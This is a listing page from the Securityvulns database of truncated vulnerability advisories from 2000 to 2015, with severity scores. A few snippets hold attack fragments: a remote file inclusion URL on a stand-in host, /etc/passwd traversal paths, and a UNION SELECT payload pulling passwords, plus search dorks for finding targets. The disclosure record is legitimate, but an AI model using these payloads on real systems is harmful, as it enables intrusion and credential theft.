Securityvulns: Most viewed

47153 matches found

securityvulns, added 2009/04/13 12:0 a.m., 89 views

[SECURITY] [DSA 1770-1] New imp4 packages fix cross-site scripting

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1770-1 [email protected] http://www.debian.org/security/ Steffen Joeris April 13, 2009 http://www.debian.org/security/faq -...

CVSS 4.3, AI score 1.6, EPSS 0.01604
Exploits: 1

securityvulns, added 2009/03/24 12:0 a.m., 89 views

PostgreSQL DoS

Stack overflow on error message conversion...

CVSS 4, AI score 4.5, EPSS 0.10242
Exploits: 2, References: 1, Affected Software: 1

securityvulns, added 2009/03/15 12:0 a.m., 89 views

[SECURITY] [DSA 1739-1] New mldonkey packages fix information disclosure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1739-1 [email protected] http://www.debian.org/security/ Florian Weimer March 13, 2009 http://www.debian.org/security/faq -...

CVSS 5, AI score 0.3, EPSS 0.05803
Exploits: 0

securityvulns, added 2009/02/10 12:0 a.m., 89 views

[BMSA-2009-02] XML injection in PyBlosxom

BLUE MOON SECURITY ADVISORY 2009-02 =================================== :Title: XML Injection in PyBlosxom :Severity: Low :Reporter: Blue Moon Consulting :Products: PyBlosxom v1.4.3 :Fixed in: -- Description ----------- PyBlosxom is a lightweight file-based weblog system. The project started as a...

AI score 7.4
Exploits: 0

securityvulns, added 2008/10/06 12:0 a.m., 89 views

CMME Multiple Information disclosure vulnerabilities

WwW.BugReport.ir AmnPardaz Security Research & Penetration Testing Group Title: CMME Multiple Information disclosure vulnerabilities Vendor: http://cmme.oesterholt.net Bug: Information Disclosure Vulnerable Version: 1.19 prior versions also may be affected Exploitation: Remote with browser Exploi...

AI score 0.2
Exploits: 0

securityvulns, added 2008/05/11 12:0 a.m., 89 views

SazCart <= 1.5.1 (prodid) Remote SQL Injection Exploit

!/usr/bin/perl SazCart = v1.5.1 details&prodid Remote SQL Injection Exploit HomePage: http://www.sazcart.com Discovered & Coded by JosS Contact: sys-projectathotmail.com Spanish Hackers Team / Sys - Project / EspSeC http://www.spanish-hackers.com rgod forever :D Dork: "Powered by SazCart" print...

AI score 0.2
Exploits: 0

securityvulns, added 2008/05/02 12:0 a.m., 89 views

[SECURITY] [DSA 1565-1] New Linux 2.6.18 packages fix several vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ---------------------------------------------------------------------- Debian Security Advisory DSA-1565-1 [email protected] http://www.debian.org/security/ dann frazier May 1, 2008 http://www.debian.org/security/faq -...

CVSS 7.8, AI score 0.1, EPSS 0.02589
Exploits: 4

securityvulns, added 2008/04/17 12:0 a.m., 89 views

ZDI-08-022: Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability

ZDI-08-022: Apple Safari WebKit PCRE Handling Integer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-022 April 16, 2008 -- CVE ID: CVE-2008-1026 -- Affected Vendors: Apple -- Affected Products: Apple Safari -- TippingPointTM IPS Customer Protection: TippingPoint IPS...

CVSS 6.8, AI score 1.1, EPSS 0.04752
Exploits: 1

securityvulns, added 2008/04/15 12:0 a.m., 89 views

[NEWS] Websphere MQ MCAUSER Setting Bypass Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

CVSS 6.6, AI score 0.1, EPSS 0.00338
Exploits: 0

securityvulns, added 2008/04/10 12:0 a.m., 89 views

ZDI-08-021: Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability

ZDI-08-021: Adobe Flash Player DeclareFunction2 Invalid Object Use Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-021 April 8, 2008 -- CVE ID: CVE-2007-6019 -- Affected Vendors: Adobe -- Affected Products: Adobe Flash Player -- Vulnerability Details: This vulnerability allows...

CVSS 9.3, AI score 0.7, EPSS 0.5977
Exploits: 3

securityvulns, added 2008/04/01 12:0 a.m., 89 views

rPSA-2008-0132-1 lighttpd

rPath Security Advisory: 2008-0132-1 Published: 2008-03-31 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Remote Deterministic Denial of Service Updated Versions: lighttpd=conary.rpath.com@rpl:1/1.4.18-0.5-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-24...

CVSS 4.3, AI score 7.2, EPSS 0.03366
Exploits: 1

securityvulns, added 2008/02/24 12:0 a.m., 89 views

joomla com_product SQL Injection(catid)

joomla comproduct SQL Injectioncatid AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 MAL : [email protected] DORK 1 : allinurl:"comproduct"catid DORK 2 : allinurl: EXPLOIT :...

AI score 0.9
Exploits: 0

securityvulns, added 2008/02/20 12:0 a.m., 89 views

[email protected], [email protected], [email protected]

Digital Security Research Group DSecRG Advisory DSECRG-08-016 Application: Jinzora Media Jukebox Versions Affected: 2.7.5 Vendor URL: http://www.jinzora.com/ Bugs: Multiple XSS Injections Exploits: YES Reported: 04.02.2008 Second report: 12.02.2008 Vendor response: NONE Date of Public Advisory:...

AI score 6.2
Exploits: 0

securityvulns, added 2007/12/27 12:0 a.m., 89 views

Blakord Portal <= Beta 1.3.A (all modules) Blind Sql Injection

Blakord Portal = Beta 1.3.A all modules Blind Sql Injection. + Info: Software: Blakord Portal HomePage: http://www.cdv3k.com Exploit: Blind Sql Injection High Where: All Modules Bug Found By: JosS / Jose Luis Góngora Fernández Contact: sys-projectathotmail.com Web: http://www.spanish-hackers.com...

AI score 0.4
Exploits: 0

securityvulns, added 2007/12/13 12:0 a.m., 89 views

QK SMTP Server DoS

No description provided...

AI score 1
Exploits: 0, References: 1, Affected Software: 1

securityvulns, added 2007/09/26 12:0 a.m., 89 views

PostgreSQL dblink library multiple security vulnerabilities

Privilege escalation...

CVSS 10, AI score 2.8, EPSS 0.2613
Exploits: 3, References: 1, Affected Software: 1

securityvulns, added 2007/08/21 12:0 a.m., 89 views

Checkpoint ZoneAlarm multiple privilege escalations

Vsdatant.sys driver multiple IOCTLs buffer overflows. Weak permissions for executable files...

CVSS 7.2, AI score 4.1, EPSS 0.00367
Exploits: 1, References: 3, Affected Software: 1

securityvulns, added 2007/08/16 12:0 a.m., 89 views

Cross Site Request Forgery in 2wire routers

Cross Site Request Forgery in 2wire routers Vulnerable Routers: 1701HG, 2071 Gateway Software: v3.17.5, 5.29.51 Password Not Set default Greetz to the Comunidad Underground de México, and to those who helped me test it: Preth00nker, nitr0us, ... [email protected] I. Background ------------- This is the...

AI score 0.4
Exploits: 0

securityvulns, added 2007/07/13 12:0 a.m., 89 views

[Full-disclosure] ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content

Advisory: ActiveWeb Contentserver CMS Clientside Filtering of Page Editor Content RedTeam Pentesting discovered a design vulnerability in the page editor of the activeWeb contentserver CMS during a penetration test. Filtering of user content, e.g. to prevent the usage of Javascript code, is done ...

CVSS 4, AI score 6.5, EPSS 0.05142
Exploits: 1

securityvulns, added 2007/07/05 12:0 a.m., 89 views

SAP DB Web Server Stack Overflow

======= Summary ======= Name: SAP DB Web Server Stack Overflow Release Date: 5 July 2007 Reference: NGS00486 Discover: Mark Litchfield [email protected] Vendor: SAP Vendor Reference: SECRES-291 Systems Affected: All Versions Risk: Critical Status: Fixed ======== TimeLine ======== Discovered: 3...

AI score 7.3
Exploits: 0

securityvulns, added 2007/04/12 12:0 a.m., 89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

CVSS 7.8, AI score 1.5, EPSS 0.08748
Exploits: 5, References: 13, Affected Software: 18

securityvulns, added 2007/03/25 12:0 a.m., 89 views

Active BuyandSell Remote SQL Injection Vulnerability

Title : Active BuyandSell Remote SQL Injection Vulnerability Author : CyberGhost Demo Page : http://www.activewebsoftwares.com/demoactivebuyandsell Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=8 Vuln. Username :...

AI score 2.3
Exploits: 0

securityvulns, added 2007/02/22 12:0 a.m., 89 views

LoveCMS 1.4 multiple vulnerabilities

rfi: /lovecms/install/index.php?step=http://site.com/boum.txt? lfi: /lovecms/install/index.php?step=/etc/passwd00 /lovecms/?load=../../../../../../../../../../etc/passwd00 admin upload vuln : upload any kind of file even if it's not accepted it will be stored here : /modules/content/pictures/tmp/...

AI score 2.2
Exploits: 0

securityvulns, added 2007/02/22 12:0 a.m., 89 views

Plantilla PHP Simple

Plantilla PHP Simple local file include vulnerability: /zadminxx/listmainpages.php?nfolder=/etc/ file upload vulnerability: upload any-script with a double extension .. laurent gaffie...

AI score 1.9
Exploits: 0

securityvulns, added 2007/02/14 12:0 a.m., 89 views

Microsoft Security Bulletin MS07-016 Cumulative Security Update for Internet Explorer (928090)

Microsoft Security Bulletin MS07-016 Cumulative Security Update for Internet Explorer 928090 Published: February 13, 2007 Version: 1.0 Summary Who Should Read this Document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum Severity Rating: Critical...

CVSS 10, AI score 0.4, EPSS 0.60813
Exploits: 0

securityvulns, added 2007/01/10 12:0 a.m., 89 views

iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability

Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability iDefense Security Advisory 01.09.07 http://labs.idefense.com/intelligence/vulnerabilities/ Jan 09, 2007 I. BACKGROUND Adobe Macromedia ColdFusion is an application server and development framework for websites. More information is...

CVSS 5, AI score 0.2, EPSS 0.12908
Exploits: 0

securityvulns, added 2007/01/05 12:0 a.m., 89 views

Wordpress <= 2.x dictionnary & Bruteforce attack

Source code !usr/bin/python Flaw found on Wordpress that allow Dictionnary & Bruteforce attack Greetz goes to : NeoMorphS, Tiky Vendor : http://wordpress.org/ Found by : Kad [email protected] / [email protected] import urllib , urllib2, sys, string tab = "sss" string.asciiletters,...

Exploits: 0

securityvulns, added 2006/12/20 12:0 a.m., 89 views

cwmVote 1.0 File Include Vulnerability

cwmVote 1.0 File Include Vulnerability F0und3R: bd0rk || SOH-Crew Website: www.soh-crew.it.tt Download: http://explorer.cwm-design.de/dirs/41/cwmVote.rar Vulnerable Code in archive.php Code: include$abs."inc/functions.inc.php"; include$abs."inc/conf.mysql.inc.php";...

AI score 0.2
Exploits: 0

securityvulns, added 2006/11/22 12:0 a.m., 89 views

Pearl Forums 2.4 Multiple Remote File Include Vulnerabilities

//Script:Pearl Forums //Author: Dr Max Virus...

AI score 0.3
Exploits: 0

securityvulns, added 2006/11/14 12:0 a.m., 89 views

ELOG Web Logbook Remote Denial of Service Vulnerability

ELOG Web Logbook Remote Denial of Service Vulnerability OS2A ID: OS2A1008 Status: 10/31/2006 Issue Discovered 11/08/2006 Reported to the Vendor 11/08/2006 Fixed by Vendor 11/10/2006 Advisory Released Class: Denial of Service Severity: Medium Overview: --------- The Electronic Logbook ELOG is part...

AI score 1
Exploits: 0

securityvulns, added 2006/11/14 12:0 a.m., 89 views

UPublisher 1.0 (viewarticle.asp) Remote SQL Injection Vulnerability

Title : UPublisher 1.0 viewarticle.asp Remote SQL Injection Vulnerability Author : ajann Dork : UPublisher http://target/path//viewarticle.asp?ID=SQL Example: //viewarticle.asp?ID=-120union20select200,password,username,0,0,0,020from20tblusers OR ---...

AI score 0.8
Exploits: 0

securityvulns, added 2006/11/05 12:0 a.m., 89 views

Ariadne v2.4 (store_config[code]) Remote File Include Vuln

Ariadne v2.4 storeconfigcode Remote File Include Vuln Found: Cyber-Security.Org...

AI score 0.4
Exploits: 0

securityvulns, added 2006/08/21 12:0 a.m., 89 views

Sonium Enterprise Adressbook Version 0.2 (folder) RFI

Sonium Enterprise Adressbook Version 0.2 folder RFI Original advisory: http://www.bb-pcsecurity.de/Websecurity/342/org/SoniumEnterpriseAdressbookVersion0.2folderRFI.htm ...

AI score 0.6
Exploits: 0

securityvulns, added 2006/08/18 12:0 a.m., 89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

AI score 1.5
Exploits: 0, References: 3, Affected Software: 1

securityvulns, added 2006/08/09 12:0 a.m., 89 views

[SA21432] Comet WebFileManager "Language" File Inclusion Vulnerability

---------------------------------------------------------------------- Hardcore Disassembler / Reverse Engineer Wanted! Want to work with IDA and BinDiff? Want to write PoC's and Exploits? Your nationality is not important. We will get you a work permit, find an apartment, and offer a relocation...

AI score 0.4
Exploits: 0

securityvulns, added 2006/07/24 12:0 a.m., 89 views

SolpotCrew Advisory #2 - Advanced Poll ver 2.02 (base_path) Remote File Inclusion

SolpotCrew Community Advanced Poll ver 2.02 basepath Remote File Inclusion Vendor site : http://www.proxy2.de/scripts.php Bug Found By :Solpot a.k.a k. Hasibuan contact: [email protected] Website : http://www.solpotcrew.org/adv/solpot-adv-02.txt Greetz: choi , cow1seng , Ibnusina ,...

AI score 1
Exploits: 0

securityvulns, added 2006/01/24 12:0 a.m., 89 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, cross-site scripting, information leaks, etc...

AI score 1.5
Exploits: 0, References: 2, Affected Software: 2

securityvulns, added 2004/01/17 12:0 a.m., 89 views

Multiple MetaDot Vulnerabilities [ All Versions ]

Vendor : Metadot Corporation URL : http://www.metadot.com Version : MetaDot Portal 5.6.5.4b5 && Earlier All Versions Risk : Multiple Vulnerabilities Description: Metadot is a popular open source portal software GPL recognized for its revolutionary ease-of-use. It provides content management like...

AI score 0.3
Exploits: 0

securityvulns, added 2003/11/14 12:0 a.m., 89 views

Web Wiz Forums ver. 7.01

Informations : °°°°°°°°°°°° Language : ASP Bugged Version : Web Wiz Forums ver. 7.01 and less ? Website : http://www.webwizforums.com Problems : Permanent XSS Objects : °°°°°°° - registernewuser.asp - register.asp The values variable are not filtered: strLocation = Request.Form"location" strMessa...

AI score 0.2
Exploits: 0

securityvulns, added 2002/10/03 12:0 a.m., 89 views

Multiple Web Security Holes

I sent this three times to webappsec but without results. I try so on bugtraq, although that is less appropriate. ----------------------------------------------------- Five products in PHP are vulnerable to various holes. 1 TightAuction Website : http://www.tightprices.com Tested Version : 3.0...

AI score 7
Exploits: 0

securityvulns, added 2002/02/27 12:0 a.m., 89 views

BadBlue Yet Another Directory Traversal

Strumpf Noir Society Advisories ! Public release ! -- -= BadBlue Yet Another Directory Traversal =- Release date: Tuesday, February 26, 2002 Introduction: BadBlue is the technology behind Working Resources Inc.'s product line with the same name and which, amongst other things, also powers...

AI score 0.4
Exploits: 0

securityvulns, added 2001/11/14 12:0 a.m., 89 views

Re: More problems with RADIUS (protocol and implementations)

I note that the original message didn't cite my short message to Bugtraq about security issues with RADIUS: http://cert.uni-stuttgart.de/archive/bugtraq/2000/12/msg00332.html Some points in that message were also covered by Joshua, he added a number of good points, and missed a few others...

AI score 1.1
Exploits: 0

securityvulns, added 2001/02/14 12:0 a.m., 89 views

RFP2101: RFPlutonium to fuel your PHP-Nuke

-----/ RFP2101 /-------------------------------/ rfp.labs / wiretrip/---- RFPlutonium to fuel your PHP-Nuke SQL hacking user logins in PHP-Nuke web portal ------------------------------------/ rain forest puppy / [email protected] Table of contents: -/ 1 / Standard advisory information -/ 2 / High...

CVSS 7.5, AI score 7.2, EPSS 0.1207
Exploits: 3

securityvulns, added 2000/12/02 12:0 a.m., 89 views

Security Bulletin MS00-092

The following is a Security Bulletin from the Microsoft Product Security Notification Service. Please do not reply to this message, as it was sent from an unattended mailbox. -----BEGIN PGP SIGNED MESSAGE----- - ------------------------------------------------------------ Issue: Buffer overrun...

AI score 0.4
Exploits: 0

securityvulns, added 2000/03/30 12:0 a.m., 89 views

Kaspersky Anti-Virus receives Trojan Checkmark certification

Press Release: Kaspersky Anti-Virus receives Trojan Checkmark certification. The first Russian antivirus guaranteed to protect users from Trojan horses! Kaspersky Lab (www.avp.ru), the Russian leader in the development of anti-virus security systems, announces that its products for...

AI score 0.7
Exploits: 0

securityvulns, added 2015/10/26 12:0 a.m., 88 views

CVE-2015-7319 - SQL Injection in Appointment Booking Calendar 1.1.7 WordPress plugin

Vulnerability title: SQL Injection in Appointment Booking Calendar 1.1.7 WordPress plugin CVE: CVE-2015-7319 Vendor: WordPress DWBooster Product: Appointment Booking Calendar Affected version: 1.1.7 Fixed version: 1.1.8 Reported by: Ibéria Medeiros Vulnerability Details: ===================== It...

CVSS 7.5, AI score 1.9, EPSS 0.02433
Exploits: 1

securityvulns, added 2015/07/13 12:0 a.m., 88 views

[SECURITY] [DSA 3306-1] pdns security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 - ------------------------------------------------------------------------- Debian Security Advisory DSA-3306-1 [email protected] https://www.debian.org/security/ Alessandro Ghedini July 09, 2015 https://www.debian.org/security/faq -...

CVSS 7.8, AI score 2.2, EPSS 0.81834
Exploits: 0

securityvulns, added 2015/06/13 12:0 a.m., 88 views

PHP multiple security vulnerabilities

NULL character injection, DoS, integer overflow, memory corruption...

CVSS 7.5, AI score 2.9, EPSS 0.50129
Exploits: 4, References: 2, Affected Software: 1

securityvulns, added 2015/06/01 12:0 a.m., 88 views

[security bulletin] HPSBGN03286 rev.1 - HP LoadRunner, Buffer Overflow

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emrna-c04594015 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c04594015 Version: 1 HPSBGN03286 rev....

CVSS 10, AI score 0.3, EPSS 0.10867
Exploits: 0

securityvulns, added 2015/05/12 12:0 a.m., 88 views

Reflected Cross-Site Scripting vulnerability in asdoc generated documentation

Reflected Cross-Site Scripting vulnerability in asdoc generated documentation Radjnies Bhansingh, March 2014...

AI score 0.5
Exploits: 0

Total number of security vulnerabilities: 5000